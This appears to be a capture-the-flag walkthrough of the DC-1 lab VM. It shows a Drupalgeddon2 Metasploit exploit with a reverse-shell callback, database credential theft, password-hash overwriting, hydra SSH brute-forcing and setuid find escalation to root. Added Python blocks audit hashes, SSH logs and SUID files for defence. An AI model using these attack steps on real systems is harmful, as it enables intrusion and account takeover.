Information gathering:
1. Host discovery:
nmap -sn 192.168.149.1/24
Target IP: 192.168.149.213
nmap -sn 192.168.149.1/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-04 21:35 EST
Nmap scan report for 192.168.149.213 // target
Host is up (0.00057s latency).
MAC Address: 00:0C:29:06:56:44 (VMware)
Nmap scan report for 192.168.149.247
Host is up (0.00052s latency).
MAC Address: A0:59:50:BC:A9:49 (Intel Corporate)
Nmap scan report for 192.168.149.116
Host is up.
2. Port scan:
nmap -sT -p- 192.168.149.213
nmap -sT -p- 192.168.149.213
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-04 21:37 EST
Nmap scan report for 192.168.149.213
Host is up (0.00093s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
36235/tcp open unknown
MAC Address: 00:0C:29:06:56:44 (VMware)
3. Service scan:
nmap -sT -sV -O --version-all -p 22,80,111,52219 192.168.149.213
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
52219/tcp closed unknown
MAC Address: 00:0C:29:06:56:44 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Web section:
Visit port 80: 192.168.149.213
Web information gathering:
Wappalyzer plugin:
CMS found: Drupal 7
whatweb:
Summary:
CMS: Drupal
Apache: 2.2.22
PHP: 5.4.45
whatweb -v 192.168.149.213
WhatWeb report for http://192.168.149.213
Status : 200 OK
Title : Welcome to Drupal Site | Drupal Site
IP : 192.168.149.213
Country : RESERVED, ZZ
Summary : Apache[2.2.22], Content-Language[en], Drupal, HTTPServer[Debian Linux][Apache/2.2.22 (Debian)], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PasswordField[pass], PHP[5.4.45-0+deb7u14], Script[text/javascript], UncommonHeaders[x-generator], X-Powered-By[PHP/5.4.45-0+deb7u14]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.2.22 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Content-Language ]
Detect the content-language setting from the HTTP header.
String : en
[ Drupal ]
Drupal is an opensource CMS written in PHP.
Aggressive function available (check plugin file or details).
Google Dorks: (1)
Website : http://www.drupal.org
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.2.22 (Debian) (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Website : http://jquery.com/
[ MetaGenerator ]
This plugin identifies meta generator tags and extracts its
value.
String : Drupal 7 (http://drupal.org)
[ PHP ]
PHP is a widely-used general-purpose scripting language
that is especially suited for Web development and can be
embedded into HTML. This plugin identifies PHP errors,
modules and versions and extracts the local file path and
username if present.
Version : 5.4.45-0+deb7u14
Google Dorks: (2)
Website : http://www.php.net/
[ PasswordField ]
find password fields
String : pass (from field name)
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
String : text/javascript
[ UncommonHeaders ]
Uncommon HTTP server headers. The blacklist includes all
the standard headers and many non standard but common ones.
Interesting but fairly common headers should have their own
plugins, eg. x-powered-by, server and x-aspnet-version.
Info about headers can be found at www.http-stats.com
String : x-generator (from headers)
[ X-Powered-By ]
X-Powered-By HTTP header
String : PHP/5.4.45-0+deb7u14 (from x-powered-by string)
HTTP Headers:
HTTP/1.1 200 OK
Date: Fri, 05 Jan 2024 10:38:20 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.45-0+deb7u14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 05 Jan 2024 10:38:20 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1704451100"
Content-Language: en
X-Generator: Drupal 7 (http://drupal.org)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2277
Connection: close
Content-Type: text/html; charset=utf-8
Searching for and exploiting the vulnerability in msf:
search Drupal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval
msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.149.213
rhosts => 192.168.149.213
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > options
Module options (exploit/unix/webapp/drupal_drupalgeddon2):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.149.213 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.149.116 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (PHP In-Memory)
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run
[*] Started reverse TCP handler on 192.168.149.116:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39927 bytes) to 192.168.149.213
[*] Meterpreter session 1 opened (192.168.149.116:4444 -> 192.168.149.213:57586) at 2024-01-04 21:46:33 -0500
meterpreter > shell
Process 3351 created.
Channel 0 created.
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux
Shell section:
Interactive shell:
python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@DC-1:/var/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
flag1:
It hints that we should look at the configuration file:
flag2:
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
Database access, flag3:
mysql -udbuser -pR0ck3t
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
mysql> use drupaldb;
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
mysql> select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; |
| 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
A Baidu search shows that Drupal ships a password-hash.sh script that generates this kind of hash;
find / -name password-hash.sh
cd /var/www/scripts/
php password-hash.sh 123456 // get the hash
mysql -udbuser -pR0ck3t
use drupaldb;update users set pass = "$S$DWqqSw82ISOz/7/tpuyVAc9m8N7eLgmrhFw76TyTMI6A1JMCg02v" where name = 'admin' or name = 'Fred';
www-data@DC-1:/var/www$ find / -name password-hash.sh
find / -name password-hash.sh
/var/www/scripts/password-hash.sh
www-data@DC-1:/var/www$ cd /var/www/scripts/
cd /var/www/scripts/
www-data@DC-1:/var/www/scripts$ ls
ls
code-clean.sh drupal.sh generate-d6-content.sh run-tests.sh
cron-curl.sh dump-database-d6.sh generate-d7-content.sh test.script
cron-lynx.sh dump-database-d7.sh password-hash.sh
www-data@DC-1:/var/www$ php /var/www/scripts/password-hash.sh 123456
php /var/www/scripts/password-hash.sh 123456
password: 123456 hash: $S$DWqqSw82ISOz/7/tpuyVAc9m8N7eLgmrhFw76TyTMI6A1JMCg02v
mysql> use drupaldb;update users set pass = "$S$DWqqSw82ISOz/7/tpuyVAc9m8N7eLgmrhFw76TyTMI6A1JMCg02v" where name = 'admin' or name = 'Fred';
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
mysql> select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$DWqqSw82ISOz/7/tpuyVAc9m8N7eLgmrhFw76TyTMI6A1JMCg02v | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; |
| 2 | Fred | $S$DWqqSw82ISOz/7/tpuyVAc9m8N7eLgmrhFw76TyTMI6A1JMCg02v | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
Logging in with the changed credentials gives flag3:
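For reference, this is the scheme behind the $S$ hashes in the users table above: Drupal 7's includes/password.inc iterates SHA-512 2^n times over an 8-character salt, encodes the digest with a phpass-style base64, and keeps the first 55 characters; the 'D' after "$S$" encodes n = 15. The port below is an added example (not code from the writeup or from Drupal), with function names of my own choosing; a defender can use check_password to audit a dumped users table for weak passwords such as 123456, or to confirm that a row has been replaced, as happened here.

```python
import hashlib
import hmac
import os
ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'  # phpass alphabet
HASH_LENGTH = 55  # Drupal stores only the first 55 chars of setting + encoded digest
DEFAULT_LOG2_ROUNDS = 15  # 'D' is index 15 in ITOA64, so "$S$D..." means 2**15 rounds

def _b64_encode(raw: bytes) -> str:
    """phpass-style base64: 6 bits per output char, no padding, ITOA64 alphabet."""
    out, i, n = [], 0, len(raw)
    while i < n:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return ''.join(out)

def rounds_of(stored: str) -> int:
    return 1 << ITOA64.index(stored[3])  # SHA-512 iterations encoded in the 4th char

def drupal7_crypt(password: str, setting: str) -> str:
    """Port of _password_crypt('sha512'): setting = '$S$' + rounds char + 8-char salt."""
    setting = setting[:12]
    if len(setting) != 12 or setting[0] != '$' or setting[2] != '$':
        raise ValueError('malformed $S$ setting')
    log2 = ITOA64.index(setting[3])
    if not 7 <= log2 <= 30:  # DRUPAL_MIN_HASH_COUNT .. DRUPAL_MAX_HASH_COUNT
        raise ValueError('iteration count out of range')
    pw = password.encode()
    digest = hashlib.sha512(setting[4:12].encode() + pw).digest()
    for _ in range(1 << log2):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _b64_encode(digest))[:HASH_LENGTH]

def hash_password(password: str, log2_rounds: int = DEFAULT_LOG2_ROUNDS) -> str:
    """What password-hash.sh does: fresh 6 random bytes, encoded to an 8-char salt."""
    return drupal7_crypt(password, '$S$' + ITOA64[log2_rounds] + _b64_encode(os.urandom(6)))

def check_password(password: str, stored: str) -> bool:
    """Verify a candidate against a stored $S$ hash using a constant-time compare."""
    if not stored.startswith('$S$') or len(stored) != HASH_LENGTH:
        return False
    return hmac.compare_digest(drupal7_crypt(password, stored), stored)
```

Only the "$S$" scheme is handled; Drupal 7 also accepts "U$S$" hashes migrated from MD5, which check_password deliberately rejects.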
flag4:
Following the hint in flag3, we look at the users and passwords on this machine:
www-data@DC-1:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash // flag4 here is a user
Try brute-forcing SSH:
First locate the wordlist that ships with Kali:
find / -name rockyou*
/usr/share/wordlists/rockyou.txt.gz // the path
/usr/share/hashcat/rules/rockyou-30000.rule
/usr/share/hashcat/masks/rockyou-2-1800.hcmask
/usr/share/hashcat/masks/rockyou-5-86400.hcmask
/usr/share/hashcat/masks/rockyou-3-3600.hcmask
Decompress the wordlist:
gzip -d /usr/share/wordlists/rockyou.txt.gz
ls /usr/share/wordlists/
amass dirbuster fasttrack.txt john.lst metasploit rockyou.txt wfuzz
dirb dnsmap.txt fern-wifi legion nmap.lst sqlmap.txt wifite.txt
------------------------------------------------------
Start the brute force:
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt ssh://192.168.149.213
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-04 22:00:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.149.213:22/
[22][ssh] host: 192.168.149.213 login: flag4 password: orange // credentials found
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-04 22:01:50
------------------------------------------------------
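What a run like this leaves behind on the target: sshd writes every attempt to /var/log/auth.log, and a burst of failures from one source followed by an accepted password login is the pattern to alert on. The detector below is an added example, not part of the writeup; the log lines are constructed to mirror the hydra run above (16 parallel tasks, about a minute, then a login), and the threshold, window and assumed year are my choices.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
# Constructed /var/log/auth.log excerpt (OpenSSH on Debian), modelled on the hydra run
# above: one source hammering flag4 in parallel, then logging in with the found password.
SAMPLE_LOG = """\
Jan  4 22:00:51 DC-1 sshd[2101]: Failed password for flag4 from 192.168.149.116 port 51234 ssh2
Jan  4 22:00:51 DC-1 sshd[2102]: Failed password for flag4 from 192.168.149.116 port 51235 ssh2
Jan  4 22:00:52 DC-1 sshd[2103]: Failed password for invalid user admin from 192.168.149.116 port 51236 ssh2
Jan  4 22:00:52 DC-1 sshd[2104]: Failed password for flag4 from 192.168.149.116 port 51237 ssh2
Jan  4 22:00:53 DC-1 sshd[2105]: Failed password for flag4 from 192.168.149.116 port 51238 ssh2
Jan  4 22:00:53 DC-1 sshd[2106]: Failed password for flag4 from 192.168.149.116 port 51239 ssh2
Jan  4 22:00:54 DC-1 sshd[2107]: Failed password for flag4 from 192.168.149.116 port 51240 ssh2
Jan  4 22:00:58 DC-1 sshd[2110]: Failed password for flag4 from 192.168.149.247 port 40001 ssh2
Jan  4 22:01:49 DC-1 sshd[2190]: Accepted password for flag4 from 192.168.149.116 port 52001 ssh2
Jan  4 22:05:00 DC-1 sshd[2201]: Accepted publickey for flag4 from 192.168.149.247 port 40002 ssh2
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) '
    r'from (?P<src>[\d.]+) port \d+')

def parse_line(line: str, year: int = 2024):
    """Parse one sshd auth line; syslog stamps carry no year, so one is assumed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m['ts'], '%b %d %H:%M:%S').replace(year=year)
    return {'ts': ts, 'result': m['result'], 'method': m['method'],
            'user': m['user'], 'src': m['src']}

def detect_bruteforce(lines, threshold: int = 5, window: timedelta = timedelta(seconds=60)):
    """Alert once per source that reaches `threshold` failures inside `window`, and
    again if that source then authenticates while the burst is still fresh."""
    recent = defaultdict(deque)  # src -> failure timestamps still inside the window
    flagged = {}                 # src -> time the threshold was crossed
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        q = recent[ev['src']]
        while q and ev['ts'] - q[0] > window:
            q.popleft()
        if ev['result'] == 'Failed':
            q.append(ev['ts'])
            if len(q) >= threshold and ev['src'] not in flagged:
                flagged[ev['src']] = ev['ts']
                alerts.append(('bruteforce', ev['src'], ev['user'], len(q)))
        elif ev['src'] in flagged and ev['ts'] - flagged[ev['src']] <= window:
            alerts.append(('success_after_bruteforce', ev['src'], ev['user'], ev['method']))
    return alerts
```

The second alert type is the one worth paging on: a password login from a source that was just rejected dozens of times is what the hydra run above looks like from the server side, and key-only authentication removes the class entirely.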
Log in over SSH and look around:
ssh flag4@192.168.149.213
The authenticity of host '192.168.149.213 (192.168.149.213)' can't be established.
flag4@192.168.149.213's password:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686
flag4@DC-1:~$ ls
flag4.txt
flag4@DC-1:~$ cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
Privilege escalation:
Try SUID escalation:
The first idea is SUID escalation: find a file owned by root that has the s bit set.
SUID (Set User ID) lets whoever runs a file execute it with the identity of the file's owner. The idea behind SUID escalation is therefore to run a SUID file owned by root: while that file runs, we hold root's identity.
Files commonly usable for SUID escalation include:
find, bash, nmap, vim, more, less, nano, cp
If a file does not have the s bit, it can be added with: chmod u+s <path to command>
Relevant commands:
find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
Escalating:
flag4@DC-1:~$ find / -perm -4000 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
flag4@DC-1:~$ find / -name flag4 -exec "/bin/sh" \;
# whoami
root // escalation done
find / -name flag4 -exec "/bin/sh" \;
This command searches the whole filesystem for files named "flag4" and runs "/bin/sh" for each one found. Piece by piece:
- "find": the command for searching the filesystem for files and directories.
- "/": the directory to start from; here "/" means the entire filesystem.
- "-name flag4": an option giving the file name to look for, "flag4"; replace it with whatever name you actually want.
- "-exec": an option that runs the given command on every file found.
- "/bin/sh": the command to run; here it is the path of a shell (the Bourne shell).
- "\": the backslash escapes the following semicolon so that it reaches -exec instead of being interpreted by the calling shell.
- ";": part of the -exec option, marking the end of the command.
So the command searches the whole filesystem for files named "flag4" and runs "/bin/sh" on each one it finds. Note that this may need administrator privileges for some directories. Because /usr/bin/find is setuid root here, the /bin/sh it spawns inherits root's effective UID, which is why the prompt changes to # and whoami reports root.
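The defender's counterpart to the listing above: an audit that reproduces find / -perm -4000 with os.walk, flags setuid-root binaries whose names are on the writeup's risky list, and emits the chmod u-s fix. This is an added example, not from the writeup; the DC-1 listing is embedded as constructed input, and the function names are my own.

```python
import os
import stat
from typing import Dict, Iterable, List, Tuple

# Programs the writeup lists as usable for SUID escalation: each can read, write or run
# something else on the caller's behalf, so a setuid-root copy effectively hands out root.
RISKY_SETUID = {'find', 'bash', 'nmap', 'vim', 'more', 'less', 'nano', 'cp'}

# Constructed input: the `find / -perm -4000` listing from the DC-1 session above.
DC1_FIND_OUTPUT = """
/bin/mount /bin/ping /bin/su /bin/ping6 /bin/umount /usr/bin/at /usr/bin/chsh
/usr/bin/passwd /usr/bin/newgrp /usr/bin/chfn /usr/bin/gpasswd /usr/bin/procmail
/usr/bin/find /usr/sbin/exim4 /usr/lib/pt_chown /usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
"""

def scan_setuid(root: str) -> List[Tuple[str, int]]:
    """Walk `root` the way `find / -perm -4000 -type f` does; return (path, owner uid)."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks into other trees
            except OSError:
                continue  # unreadable or vanished, the cases find's 2>/dev/null hides
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append((path, st.st_uid))
    return found

def classify(paths: Iterable[str]) -> Dict[str, List[str]]:
    """Flag setuid files whose basename is on the risky list and give the one-line fix."""
    report: Dict[str, List[str]] = {'risky': [], 'other': [], 'remediation': []}
    for path in sorted(set(paths)):
        if os.path.basename(path) in RISKY_SETUID:
            report['risky'].append(path)
            report['remediation'].append(f'chmod u-s {path}')
        else:
            report['other'].append(path)
    return report

def audit_find_output(text: str) -> Dict[str, List[str]]:
    """Audit a captured `find / -perm -4000` listing (whitespace-separated paths)."""
    return classify(text.split())

def audit_host(root: str = '/') -> Dict[str, List[str]]:
    """Live audit: only setuid files owned by root (uid 0) give an escalation path."""
    return classify(path for path, uid in scan_setuid(root) if uid == 0)
```

On the DC-1 listing the only hit is /usr/bin/find, which is not setuid on a stock Debian install; the remaining entries are the usual root-owned helpers (su, passwd, mount, ping and friends) that still deserve a baseline comparison on a real host.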
flag5:
# cd /root
# ls
thefinalflag.txt
# cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7